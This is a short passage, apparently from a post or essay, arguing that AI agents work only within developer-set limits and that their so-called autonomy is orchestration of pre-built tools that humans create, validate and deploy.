but they operate strictly within the boundaries developers define.

What they offer isn't true "autonomy" —
it's efficient orchestration of pre-defined tools.

Any new capability requires
a human developer to build, validate, and deploy it.